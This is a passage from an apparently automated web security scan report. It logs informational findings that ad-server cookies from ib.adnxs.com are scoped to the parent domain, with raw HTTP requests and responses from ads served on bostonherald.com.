The following cookies were issued by the application and are scoped to a parent of the issuing domain: the responses from ib.adnxs.com set them with domain=.adnxs.com, so every host under adnxs.com can read and overwrite them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15295914_1296252644%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D156514%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.4698551066685468%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb64287=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:10:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:10:44 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15295914_1296252644,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.83. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: the responses from ib.adnxs.com set them with domain=.adnxs.com, so every host under adnxs.com can read and overwrite them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61892947_1296253385%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D54892%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6713631898164749%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb322141=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:23:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:23:05 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-61892947_1296253385,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.84. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: the responses from ib.adnxs.com set them with domain=.adnxs.com, so every host under adnxs.com can read and overwrite them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15295914_1296252644%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D156514%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.4698551066685468%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb64287=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb152162=5_[r^208WMM2x@N!@@-#bq9B8?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP9B6FowdZ9lbBWHfHSmrEEKBcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQELQkBAgUCAAIAAAAAMCIpMgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265345%29%3Buf%28%27r%27%2C+116344%2C+1296265345%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:25 GMT
Content-Length: 741

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15295914_1296252644,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.85. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: the responses from ib.adnxs.com set them with domain=.adnxs.com, so every host under adnxs.com can read and overwrite them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-79489099_1296252890%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D917199%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6830512962769717%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhh